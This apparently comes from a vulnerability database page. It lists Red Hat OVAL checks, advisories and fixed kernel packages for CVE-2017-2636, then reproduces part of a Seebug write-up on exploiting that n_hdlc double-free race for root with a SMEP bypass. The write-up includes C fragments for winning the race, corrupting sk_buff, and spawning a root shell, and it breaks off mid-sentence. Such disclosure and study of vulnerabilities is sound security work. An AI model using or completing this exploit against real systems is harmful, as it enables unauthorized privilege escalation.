      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 6 is installed
        ovaloval:com.redhat.rhba:tst:20111656003
      • OR
        • commentkernel earlier than 0:2.6.32-696.1.1.el6 is currently running
          ovaloval:com.redhat.rhsa:tst:20170892027
        • commentkernel earlier than 0:2.6.32-696.1.1.el6 is set to boot up on next boot
          ovaloval:com.redhat.rhsa:tst:20170892028
      • OR
        • AND
          • commentpython-perf is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892001
          • commentpython-perf is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20111530024
        • AND
          • commentkernel-firmware is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892003
          • commentkernel-firmware is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842004
        • AND
          • commentkernel-abi-whitelists is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892005
          • commentkernel-abi-whitelists is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20131645022
        • AND
          • commentkernel-doc is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892007
          • commentkernel-doc is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842002
        • AND
          • commentkernel-headers is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892009
          • commentkernel-headers is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842010
        • AND
          • commentkernel is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892011
          • commentkernel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842012
        • AND
          • commentkernel-debug-devel is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892013
          • commentkernel-debug-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842008
        • AND
          • commentperf is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892015
          • commentperf is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842006
        • AND
          • commentkernel-devel is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892017
          • commentkernel-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842016
        • AND
          • commentkernel-debug is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892019
          • commentkernel-debug is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842014
        • AND
          • commentkernel-bootwrapper is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892021
          • commentkernel-bootwrapper is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842018
        • AND
          • commentkernel-kdump is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892023
          • commentkernel-kdump is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842020
        • AND
          • commentkernel-kdump-devel is earlier than 0:2.6.32-696.1.1.el6
            ovaloval:com.redhat.rhsa:tst:20170892025
          • commentkernel-kdump-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842022
    rhsa
    idRHSA-2017:0892
    released2017-04-11
    severityImportant
    titleRHSA-2017:0892: kernel security and bug fix update (Important)
  • bugzilla
    id1430749
    titlekernel-rt: update to the RHEL7.3.z batch#4 source tree [RT-7.3.z]
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 7 is installed
        ovaloval:com.redhat.rhba:tst:20150364027
      • OR
        • AND
          • commentkernel-rt-doc is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931001
          • commentkernel-rt-doc is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727002
        • AND
          • commentkernel-rt is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931003
          • commentkernel-rt is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727006
        • AND
          • commentkernel-rt-trace-devel is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931005
          • commentkernel-rt-trace-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727004
        • AND
          • commentkernel-rt-debug-devel is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931007
          • commentkernel-rt-debug-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727010
        • AND
          • commentkernel-rt-debug is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931009
          • commentkernel-rt-debug is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727014
        • AND
          • commentkernel-rt-trace is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931011
          • commentkernel-rt-trace is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727008
        • AND
          • commentkernel-rt-devel is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931013
          • commentkernel-rt-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20150727012
        • AND
          • commentkernel-rt-kvm is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931015
          • commentkernel-rt-kvm is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20160212018
        • AND
          • commentkernel-rt-debug-kvm is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931017
          • commentkernel-rt-debug-kvm is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20160212020
        • AND
          • commentkernel-rt-trace-kvm is earlier than 0:3.10.0-514.16.1.rt56.437.el7
            ovaloval:com.redhat.rhsa:tst:20170931019
          • commentkernel-rt-trace-kvm is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20160212016
    rhsa
    idRHSA-2017:0931
    released2017-04-12
    severityImportant
    titleRHSA-2017:0931: kernel-rt security and bug fix update (Important)
  • bugzilla
    id1428319
    titleCVE-2017-2636 kernel: Race condition access to n_hdlc.tbuf causes double free in n_hdlc_release()
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 7 is installed
        ovaloval:com.redhat.rhba:tst:20150364027
      • OR
        • commentkernel earlier than 0:3.10.0-514.16.1.el7 is currently running
          ovaloval:com.redhat.rhsa:tst:20170933031
        • commentkernel earlier than 0:3.10.0-514.16.1.el7 is set to boot up on next boot
          ovaloval:com.redhat.rhsa:tst:20170933032
      • OR
        • AND
          • commentkernel-tools-libs-devel is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933001
          • commentkernel-tools-libs-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20140678022
        • AND
          • commentkernel-doc is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933003
          • commentkernel-doc is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842002
        • AND
          • commentkernel-abi-whitelists is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933005
          • commentkernel-abi-whitelists is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20131645022
        • AND
          • commentperf is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933007
          • commentperf is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842006
        • AND
          • commentkernel-tools is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933009
          • commentkernel-tools is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20140678012
        • AND
          • commentkernel is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933011
          • commentkernel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842012
        • AND
          • commentkernel-headers is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933013
          • commentkernel-headers is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842010
        • AND
          • commentpython-perf is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933015
          • commentpython-perf is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20111530024
        • AND
          • commentkernel-devel is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933017
          • commentkernel-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842016
        • AND
          • commentkernel-tools-libs is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933019
          • commentkernel-tools-libs is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20140678016
        • AND
          • commentkernel-debug-devel is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933021
          • commentkernel-debug-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842008
        • AND
          • commentkernel-debug is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933023
          • commentkernel-debug is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842014
        • AND
          • commentkernel-bootwrapper is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933025
          • commentkernel-bootwrapper is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842018
        • AND
          • commentkernel-kdump is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933027
          • commentkernel-kdump is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842020
        • AND
          • commentkernel-kdump-devel is earlier than 0:3.10.0-514.16.1.el7
            ovaloval:com.redhat.rhsa:tst:20170933029
          • commentkernel-kdump-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhsa:tst:20100842022
    rhsa
    idRHSA-2017:0933
    released2017-04-12
    severityImportant
    titleRHSA-2017:0933: kernel security, bug fix, and enhancement update (Important)
  • rhsa
    idRHSA-2017:0932
  • rhsa
    idRHSA-2017:0986
  • rhsa
    idRHSA-2017:1125
  • rhsa
    idRHSA-2017:1126
  • rhsa
    idRHSA-2017:1232
  • rhsa
    idRHSA-2017:1233
  • rhsa
    idRHSA-2017:1488
rpms
  • kernel-0:2.6.32-696.1.1.el6
  • kernel-abi-whitelists-0:2.6.32-696.1.1.el6
  • kernel-bootwrapper-0:2.6.32-696.1.1.el6
  • kernel-debug-0:2.6.32-696.1.1.el6
  • kernel-debug-debuginfo-0:2.6.32-696.1.1.el6
  • kernel-debug-devel-0:2.6.32-696.1.1.el6
  • kernel-debuginfo-0:2.6.32-696.1.1.el6
  • kernel-debuginfo-common-i686-0:2.6.32-696.1.1.el6
  • kernel-debuginfo-common-ppc64-0:2.6.32-696.1.1.el6
  • kernel-debuginfo-common-s390x-0:2.6.32-696.1.1.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-696.1.1.el6
  • kernel-devel-0:2.6.32-696.1.1.el6
  • kernel-doc-0:2.6.32-696.1.1.el6
  • kernel-firmware-0:2.6.32-696.1.1.el6
  • kernel-headers-0:2.6.32-696.1.1.el6
  • kernel-kdump-0:2.6.32-696.1.1.el6
  • kernel-kdump-debuginfo-0:2.6.32-696.1.1.el6
  • kernel-kdump-devel-0:2.6.32-696.1.1.el6
  • perf-0:2.6.32-696.1.1.el6
  • perf-debuginfo-0:2.6.32-696.1.1.el6
  • python-perf-0:2.6.32-696.1.1.el6
  • python-perf-debuginfo-0:2.6.32-696.1.1.el6
  • kernel-rt-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debug-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debug-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debug-devel-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debug-kvm-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debug-kvm-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-debuginfo-common-x86_64-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-devel-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-doc-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-kvm-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-kvm-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-trace-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-trace-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-trace-devel-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-trace-kvm-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-trace-kvm-debuginfo-0:3.10.0-514.16.1.rt56.437.el7
  • kernel-rt-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-debug-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-debug-debuginfo-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-debug-devel-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-debuginfo-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-debuginfo-common-x86_64-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-devel-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-doc-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-firmware-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-trace-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-trace-debuginfo-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-trace-devel-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-vanilla-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-vanilla-debuginfo-1:3.10.0-514.rt56.219.el6rt
  • kernel-rt-vanilla-devel-1:3.10.0-514.rt56.219.el6rt
  • kernel-0:3.10.0-514.16.1.el7
  • kernel-abi-whitelists-0:3.10.0-514.16.1.el7
  • kernel-bootwrapper-0:3.10.0-514.16.1.el7
  • kernel-debug-0:3.10.0-514.16.1.el7
  • kernel-debug-debuginfo-0:3.10.0-514.16.1.el7
  • kernel-debug-devel-0:3.10.0-514.16.1.el7
  • kernel-debuginfo-0:3.10.0-514.16.1.el7
  • kernel-debuginfo-common-ppc64-0:3.10.0-514.16.1.el7
  • kernel-debuginfo-common-ppc64le-0:3.10.0-514.16.1.el7
  • kernel-debuginfo-common-s390x-0:3.10.0-514.16.1.el7
  • kernel-debuginfo-common-x86_64-0:3.10.0-514.16.1.el7
  • kernel-devel-0:3.10.0-514.16.1.el7
  • kernel-doc-0:3.10.0-514.16.1.el7
  • kernel-headers-0:3.10.0-514.16.1.el7
  • kernel-kdump-0:3.10.0-514.16.1.el7
  • kernel-kdump-debuginfo-0:3.10.0-514.16.1.el7
  • kernel-kdump-devel-0:3.10.0-514.16.1.el7
  • kernel-tools-0:3.10.0-514.16.1.el7
  • kernel-tools-debuginfo-0:3.10.0-514.16.1.el7
  • kernel-tools-libs-0:3.10.0-514.16.1.el7
  • kernel-tools-libs-devel-0:3.10.0-514.16.1.el7
  • perf-0:3.10.0-514.16.1.el7
  • perf-debuginfo-0:3.10.0-514.16.1.el7
  • python-perf-0:3.10.0-514.16.1.el7
  • python-perf-debuginfo-0:3.10.0-514.16.1.el7
  • kernel-0:2.6.32-358.78.1.el6
  • kernel-debug-0:2.6.32-358.78.1.el6
  • kernel-debug-debuginfo-0:2.6.32-358.78.1.el6
  • kernel-debug-devel-0:2.6.32-358.78.1.el6
  • kernel-debuginfo-0:2.6.32-358.78.1.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-358.78.1.el6
  • kernel-devel-0:2.6.32-358.78.1.el6
  • kernel-doc-0:2.6.32-358.78.1.el6
  • kernel-firmware-0:2.6.32-358.78.1.el6
  • kernel-headers-0:2.6.32-358.78.1.el6
  • perf-0:2.6.32-358.78.1.el6
  • perf-debuginfo-0:2.6.32-358.78.1.el6
  • python-perf-0:2.6.32-358.78.1.el6
  • python-perf-debuginfo-0:2.6.32-358.78.1.el6
  • kernel-0:3.10.0-327.53.1.el7
  • kernel-abi-whitelists-0:3.10.0-327.53.1.el7
  • kernel-bootwrapper-0:3.10.0-327.53.1.el7
  • kernel-debug-0:3.10.0-327.53.1.el7
  • kernel-debug-debuginfo-0:3.10.0-327.53.1.el7
  • kernel-debug-devel-0:3.10.0-327.53.1.el7
  • kernel-debuginfo-0:3.10.0-327.53.1.el7
  • kernel-debuginfo-common-ppc64-0:3.10.0-327.53.1.el7
  • kernel-debuginfo-common-ppc64le-0:3.10.0-327.53.1.el7
  • kernel-debuginfo-common-s390x-0:3.10.0-327.53.1.el7
  • kernel-debuginfo-common-x86_64-0:3.10.0-327.53.1.el7
  • kernel-devel-0:3.10.0-327.53.1.el7
  • kernel-doc-0:3.10.0-327.53.1.el7
  • kernel-headers-0:3.10.0-327.53.1.el7
  • kernel-kdump-0:3.10.0-327.53.1.el7
  • kernel-kdump-debuginfo-0:3.10.0-327.53.1.el7
  • kernel-kdump-devel-0:3.10.0-327.53.1.el7
  • kernel-tools-0:3.10.0-327.53.1.el7
  • kernel-tools-debuginfo-0:3.10.0-327.53.1.el7
  • kernel-tools-libs-0:3.10.0-327.53.1.el7
  • kernel-tools-libs-devel-0:3.10.0-327.53.1.el7
  • perf-0:3.10.0-327.53.1.el7
  • perf-debuginfo-0:3.10.0-327.53.1.el7
  • python-perf-0:3.10.0-327.53.1.el7
  • python-perf-debuginfo-0:3.10.0-327.53.1.el7
  • kernel-0:2.6.32-220.71.1.el6
  • kernel-debug-0:2.6.32-220.71.1.el6
  • kernel-debug-debuginfo-0:2.6.32-220.71.1.el6
  • kernel-debug-devel-0:2.6.32-220.71.1.el6
  • kernel-debuginfo-0:2.6.32-220.71.1.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-220.71.1.el6
  • kernel-devel-0:2.6.32-220.71.1.el6
  • kernel-doc-0:2.6.32-220.71.1.el6
  • kernel-firmware-0:2.6.32-220.71.1.el6
  • kernel-headers-0:2.6.32-220.71.1.el6
  • perf-0:2.6.32-220.71.1.el6
  • perf-debuginfo-0:2.6.32-220.71.1.el6
  • python-perf-0:2.6.32-220.71.1.el6
  • python-perf-debuginfo-0:2.6.32-220.71.1.el6
  • kernel-0:2.6.32-431.80.1.el6
  • kernel-abi-whitelists-0:2.6.32-431.80.1.el6
  • kernel-debug-0:2.6.32-431.80.1.el6
  • kernel-debug-debuginfo-0:2.6.32-431.80.1.el6
  • kernel-debug-devel-0:2.6.32-431.80.1.el6
  • kernel-debuginfo-0:2.6.32-431.80.1.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-431.80.1.el6
  • kernel-devel-0:2.6.32-431.80.1.el6
  • kernel-doc-0:2.6.32-431.80.1.el6
  • kernel-firmware-0:2.6.32-431.80.1.el6
  • kernel-headers-0:2.6.32-431.80.1.el6
  • perf-0:2.6.32-431.80.1.el6
  • perf-debuginfo-0:2.6.32-431.80.1.el6
  • python-perf-0:2.6.32-431.80.1.el6
  • python-perf-debuginfo-0:2.6.32-431.80.1.el6
  • kernel-0:2.6.32-573.42.1.el6
  • kernel-abi-whitelists-0:2.6.32-573.42.1.el6
  • kernel-bootwrapper-0:2.6.32-573.42.1.el6
  • kernel-debug-0:2.6.32-573.42.1.el6
  • kernel-debug-debuginfo-0:2.6.32-573.42.1.el6
  • kernel-debug-devel-0:2.6.32-573.42.1.el6
  • kernel-debuginfo-0:2.6.32-573.42.1.el6
  • kernel-debuginfo-common-i686-0:2.6.32-573.42.1.el6
  • kernel-debuginfo-common-ppc64-0:2.6.32-573.42.1.el6
  • kernel-debuginfo-common-s390x-0:2.6.32-573.42.1.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-573.42.1.el6
  • kernel-devel-0:2.6.32-573.42.1.el6
  • kernel-doc-0:2.6.32-573.42.1.el6
  • kernel-firmware-0:2.6.32-573.42.1.el6
  • kernel-headers-0:2.6.32-573.42.1.el6
  • kernel-kdump-0:2.6.32-573.42.1.el6
  • kernel-kdump-debuginfo-0:2.6.32-573.42.1.el6
  • kernel-kdump-devel-0:2.6.32-573.42.1.el6
  • perf-0:2.6.32-573.42.1.el6
  • perf-debuginfo-0:2.6.32-573.42.1.el6
  • python-perf-0:2.6.32-573.42.1.el6
  • python-perf-debuginfo-0:2.6.32-573.42.1.el6
  • kernel-0:2.6.32-504.60.2.el6
  • kernel-abi-whitelists-0:2.6.32-504.60.2.el6
  • kernel-debug-0:2.6.32-504.60.2.el6
  • kernel-debug-debuginfo-0:2.6.32-504.60.2.el6
  • kernel-debug-devel-0:2.6.32-504.60.2.el6
  • kernel-debuginfo-0:2.6.32-504.60.2.el6
  • kernel-debuginfo-common-x86_64-0:2.6.32-504.60.2.el6
  • kernel-devel-0:2.6.32-504.60.2.el6
  • kernel-doc-0:2.6.32-504.60.2.el6
  • kernel-firmware-0:2.6.32-504.60.2.el6
  • kernel-headers-0:2.6.32-504.60.2.el6
  • perf-0:2.6.32-504.60.2.el6
  • perf-debuginfo-0:2.6.32-504.60.2.el6
  • python-perf-0:2.6.32-504.60.2.el6
  • python-perf-debuginfo-0:2.6.32-504.60.2.el6

Seebug

bulletinFamilyexploit
descriptionThis article discloses the exploitation of [CVE-2017-2636](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2636), which is a race condition in the `n_hdlc` Linux kernel driver (`drivers/tty/n_hdlc.c`). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP). This driver provides `HDLC` serial line discipline and comes as a kernel module in many Linux distributions, which have `CONFIG_N_HDLC=m` in the kernel config. So [RHEL 6/7](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636), [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1430049), [SUSE](https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636), [Debian](https://security-tracker.debian.org/tracker/CVE-2017-2636), and [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html) were affected by CVE-2017-2636. Currently the flaw is [fixed](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) in the mainline Linux kernel ([public disclosure](http://seclists.org/oss-sec/2017/q1/569)). The bug was [introduced](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be10eb7589337e5defbe214dae038a53dd21add8) quite a long time ago, so the patch is backported to the stable kernel versions too. I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts. My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel [attack](https://gruss.cc/files/prefetch.pdf) (see xairy's [implementation](https://github.com/xairy/kaslr-bypass-via-prefetch)). First of all let's watch the [demo video](https://youtu.be/nDCvRxWxN0Y)! ## The n_hdlc bug Initially, `N_HDLC` line discipline used a self-made singly linked list for data buffers and had `n_hdlc.tbuf` pointer for buffer retransmitting after an error. It worked, but the commit `be10eb75893` added data flushing and introduced racy access to `n_hdlc.tbuf`. After tx error concurrent [`flush_tx_queue()`](http://lxr.free-electrons.com/ident?i=flush_tx_queue) and [`n_hdlc_send_frames()`](http://lxr.free-electrons.com/ident?i=n_hdlc_send_frames) both use `n_hdlc.tbuf` and can put one buffer to `tx_free_buf_list` twice. That causes an exploitable double-free error in [`n_hdlc_release()`](http://lxr.free-electrons.com/ident?i=n_hdlc_release). The data buffers are represented by `struct n_hdlc_buf` and allocated in the `kmalloc-8192` slab cache. For fixing this bug, I [used](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) a standard kernel linked list and got rid of racy `n_hdlc.tbuf`: in case of tx error the current `n_hdlc_buf` item is put after the head of `tx_buf_list`. I started the investigation when got a suspicious kernel crash from [syzkaller](https://github.com/google/syzkaller). It is a really great project, which helped to fix an [impressively big list](https://github.com/google/syzkaller/wiki/Found-Bugs) of bugs in Linux kernel. ## Exploitation This article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings! ### Winning the race Let's look to the code of the main loop: going to race till success. ``` for (;;) { long tmo1 = 0; long tmo2 = 0; if (loop % 2 == 0) tmo1 = loop % MAX_RACE_LAG_USEC; else tmo2 = loop % MAX_RACE_LAG_USEC; ``` The `loop` counter is incremented every iteration, so `tmo1` and `tmo2` variables are changing too. They are used for making lags in the racing threads, which: 1. synchronize at the `pthread_barrier`, 2. spin the specified number of microseconds in a busy loop, 3. interact with `n_hdlc`. Such a way of colliding threads helps to hit the race condition earlier. ``` ptmd = open("/dev/ptmx", O_RDWR); if (ptmd < 0) { perror("[-] open /dev/ptmx"); goto end; } ret = ioctl(ptmd, TIOCSETD, &ldisc); if (ret < 0) { perror("[-] TIOCSETD"); goto end; } ``` Here we open a pseudoterminal master and slave pair and set the `N_HDLC` line discipline for it. For more information about that, see `man ptmx`, [`Documentation/serial/tty.txt`](http://lxr.free-electrons.com/source/Documentation/serial/tty.txt) and [this](https://unix.stackexchange.com/questions/117981/what-are-the-responsibilities-of-each-pseudo-terminal-pty-component-software) great discussion about `pty` components. Setting `N_HDLC` ldisc for a serial line causes the `n_hdlc` kernel module autoloading. You can get the same effect using `ldattach` daemon. ``` ret = ioctl(ptmd, TCXONC, TCOOFF); if (ret < 0) { perror("[-] TCXONC TCOOFF"); goto end; } bytes = write(ptmd, buf, TTY_BUF_SZ); if (bytes != TTY_BUF_SZ) { printf("[-] write to ptmx (bytes)\n"); goto end; } ``` Here we suspend the pseudoterminal output (see `man tty_ioctl`) and write one data buffer. The `n_hdlc_send_frames()` fails to send this buffer and saves its address in `n_hdlc.tbuf`. We are ready for the race. Start two threads, which are allowed to run on all available CPU cores: * thread 1: flush the data with `ioctl(ptmd, TCFLSH, TCIOFLUSH)`; * thread 2: start the suspended output with `ioctl(ptmd, TCXONC, TCOON)`. In a lucky case, they both put the only written buffer pointed by `n_hdlc.tbuf` to `tx_free_buf_list`. Now we return to the CPU 0 and trigger possible double-free error: ``` ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu); if (ret != 0) { perror("[-] sched_setaffinity"); goto end; } ret = close(ptmd); if (ret != 0) { perror("[-] close /dev/ptmx"); goto end; } ``` We close the pseudoterminal master. The `n_hdlc_release()` goes through `n_hdlc_buf_list` items and frees the kernel memory used for data buffers. Here the possible double-free error happens. This particular bug is successfully detected by the Kernel Address Sanitizer ([KASAN](https://lwn.net/Articles/612153/)), which reports the use-after-free happening just before the second `kfree()`. The final part of the main loop: ``` ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS); if (ret != EXIT_SUCCESS) goto end; if (getuid() == 0 && geteuid() == 0) { printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n", loop, tmo1, tmo2); break; /* :) */ } loop++; } printf("[+] finish as: uid=0, euid=0, start sh...\n"); run_sh(); ``` Here we try to exploit the double-free error by overwriting `struct sk_buff`. In case of success, we exit from the main loop and run the root shell in the child process using `execve()`. ### Exploiting the sk_buff As I mentioned, the doubly freed `n_hdlc_buf` item is allocated in the `kmalloc-8192` slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects: * one containing some function pointer, * another one with the controllable payload, which can overwrite that pointer. Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen `sk_buff` with its `destructor_arg` in `struct skb_shared_info`. This approach is not new – consider reading the cool write-up about [CVE-2016-2384](https://xairy.github.io/blog/2016/cve-2016-2384). The network-related buffers in Linux kernel are represented by `struct sk_buff`. See [these](http://vger.kernel.org/~davem/skb_data.html) great pictures describing `sk_buff` data layout. The most important for us is that the network data and `skb_shared_info` are placed in the same kernel memory block pointed by `sk_buff.head`. So creating a 7500-byte network packet in the userspace will make `skb_shared_info` be allocated in the `kmalloc-8192` slab cache. Exactly like we want. But there is one challenge: `n_hdlc_release()` frees 13 `n_hdlc_buf` items straight away. At first I was trying to do the heap spray in parallel with `n_hdlc_release()`, but didn't manage to inject the corresponding `kmalloc()` between the needed `kfree()` calls. So I used another way: spraying **after** `n_hdlc_release()` can give two `sk_buff` items with the `head` pointing to the same memory. That's promising. So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created 